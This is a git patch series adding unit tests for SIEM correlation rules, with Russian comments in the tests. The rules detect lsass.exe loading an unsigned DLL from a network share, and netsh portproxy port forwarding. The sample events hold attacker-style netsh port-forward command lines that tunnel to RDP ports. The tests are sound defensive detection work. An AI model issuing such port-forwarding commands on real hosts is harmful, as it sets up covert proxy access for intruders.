"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-10-06T21:40:30.9100858Z\"},\"EventRecordID\":\"345820\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"6964\",\"ThreadID\":\"4396\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"02694w-win10.threebeesco.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-10-06 21:40:30.884\"},{\"Name\":\"ProcessGuid\",\"text\":\"{6a3c3ef2-50ee-5f7c-0000-0010237c0000}\"},{\"Name\":\"ProcessId\",\"text\":\"636\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"\\\\\\\\172.16.66.254\\\\shared\\\\lsadb.dll\"},{\"Name\":\"FileVersion\",\"text\":\"?\"},{\"Name\":\"Description\",\"text\":\"?\"},{\"Name\":\"Product\",\"text\":\"?\"},{\"Name\":\"Company\",\"text\":\"?\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A205D58173502270A59A6093FA6E9CE382A943AB,MD5=6666492B0246D6AC8B13DA6870314CFC,SHA256=266E4E2970FFB24EE63108F25AAC6EE8359F86728D045097D6E6309CE249BD70,IMPHASH=8DEF796746DD54062D5B3186EEF39356\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "02694w-win10.threebeesco.com", "event_src.host": "02694w-win10.threebeesco.com", "event_src.hostname": "02694w-win10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "\\\\172.16.66.254\\shared\\lsadb.dll", "object.process.hash.imphash": "8DEF796746DD54062D5B3186EEF39356", "object.process.hash.md5": "6666492B0246D6AC8B13DA6870314CFC", "object.process.hash.sha1": "A205D58173502270A59A6093FA6E9CE382A943AB", "object.process.hash.sha256": "266E4E2970FFB24EE63108F25AAC6EE8359F86728D045097D6E6309CE249BD70", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "lsadb.dll", "object.process.path": "\\\\172.16.66.254\\shared\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T18:54:28.671Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "6a3c3ef2-50ee-5f7c-0000-0010237c0000", "subject.process.id": "636", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-10-06T21:40:30.884Z", "type": "raw", "uuid": "fee95cf5-17d0-47f9-ac5c-433d03423410"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.context": "\\\\172.16.66.254\\shared\\lsadb.dll", "alert.key": "lsass.exe|\\\\172.16.66.254\\shared\\lsadb.dll", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Modify Authentication Process: Password Filter DLL", "correlation_name": "ImageLoad_from_Network_Share_to_LSASS", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "02694w-win10.threebeesco.com", "event_src.host": "02694w-win10.threebeesco.com", "event_src.hostname": "02694w-win10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "ImageLoad_from_Network_Share_to_LSASS|02694w-win10.threebeesco.com|\\\\172.16.66.254\\shared\\lsadb.dll", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "module", "object.process.fullpath": "\\\\172.16.66.254\\shared\\lsadb.dll", "object.process.meta": "Description:? | Product:? | Company:?", "object.process.name": "lsadb.dll", "object.process.path": "\\\\172.16.66.254\\shared\\", "object.property": "signature status", "object.value": "not signed", "object.version": "?", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "6a3c3ef2-50ee-5f7c-0000-0010237c0000", "subject.process.id": "636", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\"} From ee693bc58f2ad42f86c5ceabda99820c39905c96 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 11:47:19 +0300 Subject: [PATCH 23/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Portprox?= =?UTF-8?q?y=5Fnetsh)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Portproxy_netsh/tests/test_1.sc | 5 +++++ .../Portproxy_netsh/tests/test_2.sc | 4 ++++ .../Portproxy_netsh/tests/test_3.sc | 4 ++++ .../Portproxy_netsh/tests/test_4.sc | 4 ++++ 4 files changed, 17 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_3.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_4.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_1.sc new file mode 100644 index 00000000..e4b10e66 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_1.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-23 17:46:05.022129\"},\"EventRecordID\":\"1027\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"2092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-23 17:46:05.022\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-dc5c-5ce6-0000-001066e27200}\"},{\"Name\":\"ProcessId\",\"text\":\"4088\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\netsh.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\PortProxy\\\\v4tov4\\\\tcp\\\\1.2.3.4/8001\"},{\"Name\":\"Details\",\"text\":\"1.2.3.5/3389\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\services\\portproxy\\v4tov4\\tcp\\1.2.3.4/8001", "object.name": "1.2.3.4/8001", "object.new_value": "1.2.3.5/3389", "object.path": "\\registry\\machine\\system\\currentcontrolset\\services\\portproxy\\v4tov4\\tcp\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T06:34:35.025Z", "status": "success", "subject.process.fullpath": "c:\\windows\\system32\\netsh.exe", "subject.process.guid": "365abb72-dc5c-5ce6-0000-001066e27200", "subject.process.id": "4088", "subject.process.name": "netsh.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-23T17:46:05.022Z", "type": "raw", "uuid": "a3d8416f-817b-4b7c-b49c-e33add019e92"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "c:\\windows\\system32\\netsh.exe 1.2.3.4/8001->1.2.3.5/3389", "alert.key": "1.2.3.4/8001->1.2.3.5/3389", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Proxy", "correlation_name": "Portproxy_netsh", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Portproxy_netsh|iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\currentcontrolset\\services\\portproxy\\v4tov4\\tcp\\1.2.3.4/8001", "object.name": "1.2.3.4/8001", "object.new_value": "1.2.3.5/3389", "object.path": "\\registry\\machine\\system\\currentcontrolset\\services\\portproxy\\v4tov4\\tcp\\", "object.property": "value", "status": "success", "subject.process.fullpath": "c:\\windows\\system32\\netsh.exe", "subject.process.guid": "365abb72-dc5c-5ce6-0000-001066e27200", "subject.process.id": "4088", "subject.process.name": "netsh.exe", "subject.process.path": "c:\\windows\\system32\\"} + diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_2.sc new file mode 100644 index 00000000..2437f1e3 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-23 17:46:04.671625\"},\"EventRecordID\":\"1026\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2032\",\"ThreadID\":\"2092\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-23 17:46:04.651\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-dc5c-5ce6-0000-001066e27200}\"},{\"Name\":\"ProcessId\",\"text\":\"4088\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7600.16385 (win7_rtm.090713-1255)\"},{\"Name\":\"Description\",\"text\":\"Network Command Shell\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-ce6c-5ce6-0000-002047f30000}\"},{\"Name\":\"LogonId\",\"text\":\"0x000000000000f347\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0,MD5=784A50A6A09C25F011C3143DDD68E729,SHA256=661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943,IMPHASH=33B8120C37D7861778989FBFD16214E1\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-dc3e-5ce6-0000-00102bc97200}\"},{\"Name\":\"ParentProcessId\",\"text\":\"712\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-ce6c-5ce6-0000-002047f30000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "62279", "object.process.cmdline": "netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5", "object.process.cwd": "c:\\", "object.process.fullpath": "c:\\windows\\system32\\netsh.exe", "object.process.guid": "365abb72-dc5c-5ce6-0000-001066e27200", "object.process.hash.imphash": "33B8120C37D7861778989FBFD16214E1", "object.process.hash.md5": "784A50A6A09C25F011C3143DDD68E729", "object.process.hash.sha1": "7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0", "object.process.hash.sha256": "661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943", "object.process.id": "4088", "object.process.meta": "Description:Network Command Shell | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "netsh.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.guid": "365abb72-dc3e-5ce6-0000-00102bc97200", "object.process.parent.id": "712", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T10:10:15.193Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "62279", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-23T17:46:04.651Z", "type": "raw", "uuid": "a74d0b25-16d5-4ed0-aea1-cfed8b6da080"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "iewin7\\ieuser netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5", "alert.key": "netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Proxy", "correlation_name": "Portproxy_netsh", "correlation_type": "incident", "datafield6": "365abb72-ce6c-5ce6-0000-002047f30000", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Portproxy_netsh|iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "62279", "object.process.cmdline": "netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5", "object.process.cwd": "c:\\", "object.process.fullpath": "c:\\windows\\system32\\netsh.exe", "object.process.guid": "365abb72-dc5c-5ce6-0000-001066e27200", "object.process.hash.md5": "784A50A6A09C25F011C3143DDD68E729", "object.process.hash.sha1": "7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0", "object.process.hash.sha256": "661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943", "object.process.id": "4088", "object.process.meta": "Description:Network Command Shell | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "netsh.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.parent.id": "712", "object.process.parent.name": "cmd.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "62279"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_3.sc new file mode 100644 index 00000000..d6b1144c --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_3.sc @@ -0,0 +1,4 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4657\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12801\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-03T09:35:26.2279148Z\"},\"EventRecordID\":\"97027\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"6900\"},\"Channel\":\"Security\",\"Computer\":\"pc1.lab.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1840087645-2506612525-4240436938-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"admin\"},{\"Name\":\"SubjectDomainName\",\"text\":\"LAB\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x520de\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp\"},{\"Name\":\"ObjectValueName\",\"text\":\"0.0.0.0/8882\"},{\"Name\":\"HandleId\",\"text\":\"0x4a0\"},{\"Name\":\"OperationType\",\"text\":\"%%1904\"},{\"Name\":\"OldValueType\",\"text\":\"-\"},{\"Name\":\"OldValue\",\"text\":\"-\"},{\"Name\":\"NewValueType\",\"text\":\"%%1873\"},{\"Name\":\"NewValue\",\"text\":\"0.0.0.0/3382\"},{\"Name\":\"ProcessId\",\"text\":\"0xd00\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "pc1.lab.local", "event_src.host": "pc1.lab.local", "event_src.hostname": "pc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4657_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4657", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\controlset001\\services\\portproxy\\v4tov4\\tcp\\0.0.0.0/8882", "object.name": "0.0.0.0/8882", "object.new_value": "0.0.0.0/3382", "object.path": "\\registry\\machine\\system\\controlset001\\services\\portproxy\\v4tov4\\tcp", "object.property": "value", "object.value": "-", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T09:36:06.739Z", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.session_id": "336094", "subject.process.fullpath": "C:\\Windows\\System32\\netsh.exe", "subject.process.name": "netsh.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-03T09:35:26.227Z", "type": "raw", "uuid": "246f60fe-90f0-472d-a419-9284174bdeb1"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "C:\\Windows\\System32\\netsh.exe 0.0.0.0/8882->0.0.0.0/3382", "alert.key": "0.0.0.0/8882->0.0.0.0/3382", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Proxy", "correlation_name": "Portproxy_netsh", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "pc1.lab.local", "event_src.hostname": "pc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Portproxy_netsh|pc1.lab.local", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\system\\controlset001\\services\\portproxy\\v4tov4\\tcp\\0.0.0.0/8882", "object.name": "0.0.0.0/8882", "object.new_value": "0.0.0.0/3382", "object.path": "\\registry\\machine\\system\\controlset001\\services\\portproxy\\v4tov4\\tcp", "object.property": "value", "object.value": "-", "status": "success", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.session_id": "336094", "subject.process.fullpath": "C:\\Windows\\System32\\netsh.exe", "subject.process.name": "netsh.exe", "subject.process.path": "C:\\Windows\\System32\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_4.sc new file mode 100644 index 00000000..e7912d49 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/Portproxy_netsh/tests/test_4.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-03T09:35:26.1698588Z\"},\"EventRecordID\":\"97025\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"6900\"},\"Channel\":\"Security\",\"Computer\":\"pc1.lab.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1840087645-2506612525-4240436938-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"admin\"},{\"Name\":\"SubjectDomainName\",\"text\":\"LAB\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x520de\"},{\"Name\":\"NewProcessId\",\"text\":\"0xd00\"},{\"Name\":\"NewProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\netsh.exe\"},{\"Name\":\"TokenElevationType\",\"text\":\"%%1936\"},{\"Name\":\"ProcessId\",\"text\":\"0x8fc\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\netsh.exe\\\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"TargetUserName\",\"text\":\"-\"},{\"Name\":\"TargetDomainName\",\"text\":\"-\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x0\"},{\"Name\":\"ParentProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"MandatoryLabel\",\"text\":\"S-1-16-12288\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "pc1.lab.local", "event_src.host": "pc1.lab.local", "event_src.hostname": "pc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "lab", "object.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "object.account.name": "admin", "object.account.session_id": "336094", "object.process.cmdline": "\"C:\\Windows\\system32\\netsh.exe\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382", "object.process.fullpath": "c:\\windows\\system32\\netsh.exe", "object.process.id": "3328", "object.process.name": "netsh.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.id": "2300", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T09:38:00.838Z", "status": "success", "subject": "account", "subject.account.domain": "lab", "subject.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "subject.account.name": "admin", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "336094", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-03T09:35:26.169Z", "type": "raw", "uuid": "abdf4340-6eeb-450b-a57e-2851c16dc7fd"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "lab\\admin \"C:\\Windows\\system32\\netsh.exe\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382", "alert.key": "\"C:\\Windows\\system32\\netsh.exe\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Proxy", "correlation_name": "Portproxy_netsh", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "pc1.lab.local", "event_src.hostname": "pc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Portproxy_netsh|pc1.lab.local", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "lab", "object.account.id": "S-1-5-21-1840087645-2506612525-4240436938-1000", "object.account.name": "admin", "object.account.session_id": "336094", "object.process.cmdline": "\"C:\\Windows\\system32\\netsh.exe\" interface port add v4 listenaddress=0.0.0.0 listenport=8882 connecta=0.0.0.0 connectp=3382", "object.process.fullpath": 